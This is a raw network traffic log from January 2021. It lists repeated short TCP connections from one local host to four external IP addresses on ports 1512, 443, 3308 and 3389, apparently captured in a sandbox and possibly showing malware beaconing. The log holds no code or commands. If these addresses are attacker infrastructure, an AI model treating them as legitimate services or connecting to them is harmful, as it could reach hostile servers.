Jan 11, 2021 16:54:16.990822077 CET	1512	49390	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:16.993572950 CET	49390	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:17.002818108 CET	49390	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:17.003046989 CET	49390	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:17.055841923 CET	1512	49390	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:17.056041002 CET	49390	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:17.092943907 CET	1512	49390	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:17.108877897 CET	1512	49390	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:17.209276915 CET	1512	49390	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:17.209321022 CET	1512	49390	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:17.209467888 CET	49390	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:17.215572119 CET	49390	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:17.268640995 CET	1512	49390	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:17.327146053 CET	49391	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:17.379338980 CET	443	49391	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:17.379436970 CET	49391	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:17.380959988 CET	49391	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:17.433115959 CET	443	49391	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:17.447757959 CET	443	49391	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:17.447848082 CET	49391	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:17.456861019 CET	49391	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:17.511646986 CET	443	49391	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:17.511888027 CET	49391	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:17.522507906 CET	49391	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:17.523051977 CET	49391	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:17.575115919 CET	443	49391	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:17.575274944 CET	49391	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:17.614916086 CET	443	49391	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:17.627494097 CET	443	49391	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:17.745328903 CET	443	49391	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:17.745374918 CET	443	49391	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:17.745538950 CET	49391	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:17.752155066 CET	49391	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:17.804280996 CET	443	49391	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:17.873481035 CET	49392	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:17.916685104 CET	3308	49392	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:17.916915894 CET	49392	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:17.918380976 CET	49392	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:17.961440086 CET	3308	49392	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:17.972142935 CET	3308	49392	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:17.972183943 CET	3308	49392	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:17.972215891 CET	49392	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:17.972234011 CET	49392	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:17.981359005 CET	49392	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:18.026381969 CET	3308	49392	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:18.026566029 CET	49392	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:18.034993887 CET	49392	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:18.035339117 CET	49392	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:18.078377008 CET	3308	49392	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:18.078605890 CET	49392	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:18.118201017 CET	3308	49392	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:18.121768951 CET	3308	49392	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:18.121823072 CET	3308	49392	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:18.232590914 CET	3308	49392	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:18.232640982 CET	3308	49392	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:18.232832909 CET	49392	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:18.239285946 CET	49392	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:18.282452106 CET	3308	49392	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:18.351924896 CET	49393	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:18.405589104 CET	3389	49393	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:18.405726910 CET	49393	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:18.406583071 CET	49393	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:18.460037947 CET	3389	49393	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:18.475581884 CET	3389	49393	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:18.475617886 CET	3389	49393	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:18.475761890 CET	49393	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:18.490978956 CET	49393	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:18.552279949 CET	3389	49393	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:18.552380085 CET	49393	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:18.561790943 CET	49393	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:18.561912060 CET	49393	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:18.619316101 CET	3389	49393	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:18.619632959 CET	49393	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:18.658464909 CET	3389	49393	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:18.673373938 CET	3389	49393	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:18.673456907 CET	3389	49393	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:18.762001991 CET	3389	49393	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:18.762044907 CET	3389	49393	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:18.762317896 CET	49393	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:18.762358904 CET	49393	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:18.768577099 CET	49393	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:18.822426081 CET	3389	49393	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:18.887089014 CET	49394	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:18.939982891 CET	1512	49394	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:18.940099001 CET	49394	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:18.941514015 CET	49394	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:18.994210005 CET	1512	49394	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:19.001749992 CET	1512	49394	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:19.001781940 CET	1512	49394	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:19.001926899 CET	49394	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:19.017173052 CET	49394	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:19.071259975 CET	1512	49394	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:19.071439028 CET	49394	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:19.075979948 CET	49394	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:19.076205969 CET	49394	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:19.128839016 CET	1512	49394	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:19.129050016 CET	49394	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:19.168833971 CET	1512	49394	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:19.181735039 CET	1512	49394	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:19.181768894 CET	1512	49394	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:19.284987926 CET	1512	49394	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:19.285021067 CET	1512	49394	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:19.285160065 CET	49394	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:19.287208080 CET	49394	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:19.341032982 CET	1512	49394	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:19.402198076 CET	49395	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:19.455215931 CET	443	49395	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:19.455408096 CET	49395	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:19.456969023 CET	49395	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:19.511174917 CET	443	49395	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:19.528350115 CET	443	49395	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:19.528521061 CET	49395	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:19.535765886 CET	49395	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:19.591639042 CET	443	49395	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:19.591757059 CET	49395	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:19.600886106 CET	49395	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:19.601254940 CET	49395	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:19.653414011 CET	443	49395	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:19.653682947 CET	49395	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:19.692023993 CET	443	49395	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:19.705580950 CET	443	49395	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:19.823784113 CET	443	49395	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:19.823832989 CET	443	49395	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:19.824114084 CET	49395	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:19.829715967 CET	49395	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:19.883213043 CET	443	49395	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:19.945189953 CET	49396	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:19.988449097 CET	3308	49396	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:19.988667965 CET	49396	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:19.989833117 CET	49396	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:20.032857895 CET	3308	49396	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:20.046161890 CET	3308	49396	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:20.046195030 CET	3308	49396	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:20.046269894 CET	49396	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:20.046315908 CET	49396	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:20.058834076 CET	49396	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:20.104362011 CET	3308	49396	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:20.104623079 CET	49396	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:20.113439083 CET	49396	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:20.113595963 CET	49396	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:20.156740904 CET	3308	49396	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:20.157032013 CET	49396	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:20.199037075 CET	3308	49396	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:20.200303078 CET	3308	49396	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:20.313225985 CET	3308	49396	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:20.313261032 CET	3308	49396	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:20.313450098 CET	49396	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:20.319032907 CET	49396	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:20.362164021 CET	3308	49396	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:20.431818008 CET	49397	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:20.485147953 CET	3389	49397	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:20.485299110 CET	49397	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:20.486973047 CET	49397	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:20.540422916 CET	3389	49397	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:20.560146093 CET	3389	49397	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:20.560185909 CET	3389	49397	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:20.560314894 CET	49397	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:20.574075937 CET	49397	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:20.633770943 CET	3389	49397	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:20.633860111 CET	49397	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:20.638375998 CET	49397	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:20.638494015 CET	49397	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:20.693137884 CET	3389	49397	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:20.693248034 CET	49397	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:20.731669903 CET	3389	49397	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:20.748276949 CET	3389	49397	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:20.748321056 CET	3389	49397	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:20.837373018 CET	3389	49397	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:20.837459087 CET	3389	49397	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:20.837492943 CET	49397	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:20.837518930 CET	49397	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:20.840331078 CET	49397	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:20.893632889 CET	3389	49397	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:20.941960096 CET	49398	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:20.995009899 CET	1512	49398	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:20.995270014 CET	49398	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:20.995881081 CET	49398	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:21.048855066 CET	1512	49398	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:21.056355000 CET	1512	49398	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:21.056386948 CET	1512	49398	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:21.056560993 CET	49398	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:21.056595087 CET	49398	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:21.063618898 CET	49398	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:21.117820978 CET	1512	49398	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:21.120886087 CET	49398	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:21.128710985 CET	49398	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:21.128735065 CET	49398	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:21.181968927 CET	1512	49398	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:21.182090044 CET	49398	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:21.221232891 CET	1512	49398	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:21.235110044 CET	1512	49398	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:21.235150099 CET	1512	49398	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:21.335971117 CET	1512	49398	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:21.336014986 CET	1512	49398	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:21.336255074 CET	49398	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:21.342930079 CET	49398	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:21.395986080 CET	1512	49398	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:21.461633921 CET	49399	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:21.513694048 CET	443	49399	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:21.513819933 CET	49399	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:21.515510082 CET	49399	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:21.567208052 CET	443	49399	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:21.581721067 CET	443	49399	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:21.581826925 CET	49399	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:21.590768099 CET	49399	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:21.644731998 CET	443	49399	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:21.644918919 CET	49399	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:21.658886909 CET	49399	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:21.659101009 CET	49399	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:21.710721970 CET	443	49399	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:21.710805893 CET	49399	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:21.762356043 CET	443	49399	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:21.880300999 CET	443	49399	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:21.880343914 CET	443	49399	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:21.880517006 CET	49399	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:21.883749962 CET	49399	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:21.935314894 CET	443	49399	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:21.988785982 CET	49400	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:22.034739971 CET	3308	49400	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:22.034868956 CET	49400	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:22.037194014 CET	49400	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:22.083108902 CET	3308	49400	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:22.092957973 CET	3308	49400	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:22.093029976 CET	49400	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:22.093053102 CET	3308	49400	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:22.093092918 CET	49400	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:22.104990959 CET	49400	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:22.152271986 CET	3308	49400	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:22.152371883 CET	49400	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:22.158129930 CET	49400	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:22.158380032 CET	49400	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:22.201374054 CET	3308	49400	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:22.201500893 CET	49400	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:22.241014004 CET	3308	49400	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:22.244508982 CET	3308	49400	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:22.244539976 CET	3308	49400	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:22.356028080 CET	3308	49400	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:22.356066942 CET	3308	49400	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:22.356184006 CET	49400	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:22.358475924 CET	49400	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:22.401544094 CET	3308	49400	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:22.476035118 CET	49401	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:22.530283928 CET	3389	49401	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:22.530353069 CET	49401	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:22.531713009 CET	49401	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:22.585872889 CET	3389	49401	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:22.641848087 CET	3389	49401	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:22.641882896 CET	3389	49401	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:22.642050982 CET	49401	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:22.653750896 CET	49401	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:22.707710981 CET	3389	49401	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:22.729521036 CET	3389	49401	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:22.729722977 CET	49401	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:22.740286112 CET	49401	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:22.740605116 CET	49401	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:22.794498920 CET	3389	49401	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:22.794595003 CET	49401	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:22.834220886 CET	3389	49401	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:22.848757029 CET	3389	49401	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:22.848777056 CET	3389	49401	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:22.938874960 CET	3389	49401	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:22.938927889 CET	3389	49401	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:22.939014912 CET	49401	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:22.939038038 CET	49401	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:22.941535950 CET	49401	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:22.995922089 CET	3389	49401	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:23.050771952 CET	49402	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:23.103864908 CET	1512	49402	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:23.104043007 CET	49402	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:23.105195999 CET	49402	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:23.157995939 CET	1512	49402	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:23.165513039 CET	1512	49402	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:23.165544987 CET	1512	49402	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:23.165610075 CET	49402	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:23.165635109 CET	49402	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:23.172677040 CET	49402	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:23.226994991 CET	1512	49402	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:23.227117062 CET	49402	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:23.240210056 CET	49402	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:23.240394115 CET	49402	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:23.294032097 CET	1512	49402	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:23.294130087 CET	49402	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:23.332967997 CET	1512	49402	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:23.347121000 CET	1512	49402	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:23.347136021 CET	1512	49402	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:23.447401047 CET	1512	49402	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:23.447439909 CET	1512	49402	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:23.447623014 CET	49402	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:23.453571081 CET	49402	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:23.506465912 CET	1512	49402	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:23.567652941 CET	49403	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:23.619533062 CET	443	49403	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:23.619689941 CET	49403	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:23.621448994 CET	49403	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:23.675941944 CET	443	49403	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:23.702207088 CET	443	49403	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:23.702353001 CET	49403	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:23.717952967 CET	49403	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:23.772169113 CET	443	49403	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:23.772372961 CET	49403	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:23.782330990 CET	49403	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:23.782704115 CET	49403	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:23.834356070 CET	443	49403	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:23.834459066 CET	49403	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:23.870903969 CET	443	49403	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:23.886184931 CET	443	49403	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:24.004386902 CET	443	49403	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:24.004429102 CET	443	49403	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:24.004614115 CET	49403	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:24.010334015 CET	49403	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:24.061983109 CET	443	49403	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:24.129280090 CET	49404	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:24.172559977 CET	3308	49404	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:24.172713995 CET	49404	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:24.174078941 CET	49404	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:24.217161894 CET	3308	49404	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:24.228106976 CET	3308	49404	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:24.228142977 CET	3308	49404	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:24.228262901 CET	49404	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:24.243110895 CET	49404	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:24.287985086 CET	3308	49404	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:24.288160086 CET	49404	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:24.298727036 CET	49404	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:24.299190998 CET	49404	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:24.342345953 CET	3308	49404	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:24.342535973 CET	49404	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:24.382929087 CET	3308	49404	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:24.385768890 CET	3308	49404	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:24.385879040 CET	3308	49404	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:24.500488043 CET	3308	49404	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:24.500533104 CET	3308	49404	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:24.500721931 CET	49404	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:24.506400108 CET	49404	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:24.549457073 CET	3308	49404	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:24.624623060 CET	49405	3389	192.168.2.22	5.100.228.233
